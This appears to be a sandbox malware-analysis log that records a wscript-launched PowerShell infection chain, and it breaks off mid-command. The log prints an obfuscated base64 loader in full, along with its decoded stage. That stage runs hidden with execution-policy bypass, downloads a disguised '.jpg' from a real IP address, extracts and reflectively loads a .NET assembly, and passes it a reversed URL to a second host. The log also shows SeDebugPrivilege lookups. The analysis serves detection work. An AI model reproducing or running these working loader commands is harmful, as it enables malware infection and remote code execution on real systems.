command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DQ⁂NQ⁂u⁂Dg⁂O⁂⁂u⁂DY⁂Ng⁂u⁂DQ⁂Mw⁂v⁂HI⁂dQBt⁂H⁂⁂ZQBf⁂HY⁂YgBz⁂C4⁂agBw⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂egB6⁂Go⁂ZgBn⁂Ho⁂ZgBn⁂Go⁂egB4⁂GY⁂ZwBq⁂Gg⁂ZgBn⁂GQ⁂N⁂⁂2⁂FM⁂QQBC⁂F8⁂RgBF⁂Ec⁂XwBu⁂Gk⁂cwB1⁂G8⁂Yw⁂v⁂DQ⁂Mg⁂u⁂D⁂⁂Mg⁂x⁂C4⁂O⁂⁂3⁂DE⁂Lg⁂1⁂Dk⁂MQ⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂J⁂Bh⁂HI⁂ZwB1⁂G0⁂ZQBu⁂HQ⁂cw⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DQ⁂NQ⁂u⁂Dg⁂O⁂⁂u⁂DY⁂Ng⁂u⁂DQ⁂Mw⁂v⁂HI⁂dQBt⁂H⁂⁂ZQBf⁂HY⁂YgBz⁂C4⁂agBw⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂egB6⁂Go⁂ZgBn⁂Ho⁂ZgBn⁂Go⁂egB4⁂GY⁂ZwBq⁂Gg⁂ZgBn⁂GQ⁂N⁂⁂2⁂FM⁂QQBC⁂F8⁂RgBF⁂Ec⁂XwBu⁂Gk⁂cwB1⁂G8⁂Yw⁂v⁂DQ⁂Mg⁂u⁂D⁂⁂Mg⁂x⁂C4⁂O⁂⁂3⁂DE⁂Lg⁂1⁂Dk⁂MQ⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂J⁂Bh⁂HI⁂ZwB1⁂G0⁂ZQBu⁂HQ⁂cw⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2228
thread_handle: 0x0000044c
process_identifier: 2224
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://45.88.66.43/rumpe_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.zzjfgzfgjzxfgjhfgd46SAB_FEG_nisuoc/42.021.871.591//:ptth');$method.Invoke($null, $arguments)"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 45.88.66.43
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://45.88.66.43/rumpe_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.zzjfgzfgjzxfgjhfgd46SAB_FEG_nisuoc/42.021.871.591//:ptth');$method.Invoke($null, $arguments)"
parent_process wscript.exe martian_process powershell -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DQ⁂NQ⁂u⁂Dg⁂O⁂⁂u⁂DY⁂Ng⁂u⁂DQ⁂Mw⁂v⁂HI⁂dQBt⁂H⁂⁂ZQBf⁂HY⁂YgBz⁂C4⁂agBw⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂egB6⁂Go⁂ZgBn⁂Ho⁂ZgBn⁂Go⁂egB4⁂GY⁂ZwBq⁂Gg⁂ZgBn⁂GQ⁂N⁂⁂2⁂FM⁂QQBC⁂F8⁂RgBF⁂Ec⁂XwBu⁂Gk⁂cwB1⁂G8⁂Yw⁂v⁂DQ⁂Mg⁂u⁂D⁂⁂Mg⁂x⁂C4⁂O⁂⁂3⁂DE⁂Lg⁂1⁂Dk⁂MQ⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂J⁂Bh⁂HI⁂ZwB1⁂G0⁂ZQBu⁂HQ⁂cw⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DQ⁂NQ⁂u⁂Dg⁂O⁂⁂u⁂DY⁂Ng⁂u⁂DQ⁂Mw⁂v⁂HI⁂dQBt⁂H⁂⁂ZQBf⁂HY⁂YgBz⁂C4⁂agBw⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂H